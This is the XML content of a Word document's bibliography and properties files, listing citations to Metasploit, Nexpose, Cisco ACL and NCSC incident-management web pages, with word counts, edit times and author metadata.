    <b:ProductionCompany>Kali.org</b:ProductionCompany>
    <b:Year>2023</b:Year>
    <b:Month>August</b:Month>
    <b:Day>17</b:Day>
    <b:YearAccessed>2023</b:YearAccessed>
    <b:MonthAccessed>November</b:MonthAccessed>
    <b:DayAccessed>2</b:DayAccessed>
    <b:URL>https://www.kali.org/tools/metasploit-framework/</b:URL>
    <b:RefOrder>9</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>OffBC</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{7D0D9376-CB2D-43D8-8D4A-7AB9B1FB2254}</b:Guid>
    <b:Author>
      <b:Author>
        <b:Corporate>Offsec.com</b:Corporate>
      </b:Author>
    </b:Author>
    <b:Title>Metasploit Unleashed</b:Title>
    <b:ProductionCompany>Offsec.com</b:ProductionCompany>
    <b:Year>TBC</b:Year>
    <b:Month>TBC</b:Month>
    <b:Day>TBC</b:Day>
    <b:YearAccessed>2023</b:YearAccessed>
    <b:MonthAccessed>November</b:MonthAccessed>
    <b:DayAccessed>2</b:DayAccessed>
    <b:URL>https://www.offsec.com/metasploit-unleashed/</b:URL>
    <b:RefOrder>4</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>RapBC</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{0E93B60F-054A-4096-A364-DA8A40CEC5FB}</b:Guid>
    <b:Author>
      <b:Author>
        <b:Corporate>Rapid 7</b:Corporate>
      </b:Author>
    </b:Author>
    <b:Title>Metasploit Documentation Penetration Testing Software</b:Title>
    <b:ProductionCompany>Rapid 7</b:ProductionCompany>
    <b:Year>TBC</b:Year>
    <b:Month>TBC</b:Month>
    <b:Day>TBC</b:Day>
    <b:YearAccessed>2023</b:YearAccessed>
    <b:MonthAccessed>November</b:MonthAccessed>
    <b:DayAccessed>2</b:DayAccessed>
    <b:URL>https://docs.metasploit.com/docs/modules.html</b:URL>
    <b:RefOrder>6</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Cis14</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{0ACBAAC8-B295-41AB-A660-794C465BE70E}</b:Guid>
    <b:Author>
      <b:Author>
        <b:Corporate>Cisco</b:Corporate>
      </b:Author>
    </b:Author>
    <b:Title>Security Configuration Guide Access Control Lists</b:Title>
    <b:ProductionCompany>Cisco</b:ProductionCompany>
    <b:Year>2014</b:Year>
    <b:Month>April</b:Month>
    <b:Day>2</b:Day>
    <b:YearAccessed>2023</b:YearAccessed>
    <b:MonthAccessed>November</b:MonthAccessed>
    <b:DayAccessed>4</b:DayAccessed>
    <b:URL>https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/sec_data_acl/configuration/15-mt/sec-data-acl-15-mt-book/sec-cfg-ip-filter.html</b:URL>
    <b:RefOrder>7</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Rap7Nx</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{0F97A912-A47A-4509-A83C-78792F0D1C6D}</b:Guid>
    <b:Author>
      <b:Author>
        <b:Corporate>Rapid 7</b:Corporate>
      </b:Author>
    </b:Author>
    <b:Title>Vulnerability Scanning with Nexpose</b:Title>
    <b:ProductionCompany>Rapid 7</b:ProductionCompany>
    <b:Year>TBC</b:Year>
    <b:Month>TBC</b:Month>
    <b:Day>TBC</b:Day>
    <b:YearAccessed>2023</b:YearAccessed>
    <b:MonthAccessed>November</b:MonthAccessed>
    <b:DayAccessed>5</b:DayAccessed>
    <b:URL>https://docs.rapid7.com/metasploit/vulnerability-scanning-with-nexpose/</b:URL>
    <b:RefOrder>2</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>RapMetEd</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{5CB90605-1DA5-4430-A868-8EB1E936BBB8}</b:Guid>
    <b:Author>
      <b:Author>
        <b:Corporate>Rapid 7</b:Corporate>
      </b:Author>
    </b:Author>
    <b:Title>Metasploit Editions1; Network Pen Testing Tools</b:Title>
    <b:ProductionCompany>Rapid 7</b:ProductionCompany>
    <b:Year>TBC</b:Year>
    <b:Month>TBC</b:Month>
    <b:Day>TBC</b:Day>
    <b:YearAccessed>2023</b:YearAccessed>
    <b:MonthAccessed>November</b:MonthAccessed>
    <b:DayAccessed>5</b:DayAccessed>
    <b:URL>https://www.rapid7.com/products/metasploit/download/editions/</b:URL>
    <b:RefOrder>3</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>NCS23IR</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{E460FE12-40BB-49A7-812A-7D0E6B61D37C}</b:Guid>
    <b:Author>
      <b:Author>
        <b:Corporate>NCSC</b:Corporate>
      </b:Author>
    </b:Author>
    <b:Title>Incident Managment</b:Title>
    <b:ProductionCompany>National Cybersecurity Centre</b:ProductionCompany>
    <b:Year>TBC</b:Year>
    <b:Month>TBC</b:Month>
    <b:Day>TBC</b:Day>
    <b:YearAccessed>2023</b:YearAccessed>
    <b:MonthAccessed>November</b:MonthAccessed>
    <b:DayAccessed>5</b:DayAccessed>
    <b:URL>https://www.ncsc.gov.uk/collection/incident-management/cyber-incident-response-processes</b:URL>
    <b:RefOrder>8</b:RefOrder>
  </b:Source>
</b:Sources>
</file>

<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{12EB5953-F3D4-4BD8-BE59-5D6204851B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879</TotalTime>
  <Pages>21</Pages>
  <Words>4692</Words>
  <Characters>26745</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>222</Lines>
  <Paragraphs>62</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>31375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Rees (0151968)</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Simon Rees (0151968)</cp:lastModifiedBy>
  <cp:revision>792</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-11-02T18:51:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-11-05T14:00:00Z</dcterms:modified>
</cp:coreProperties>
</file>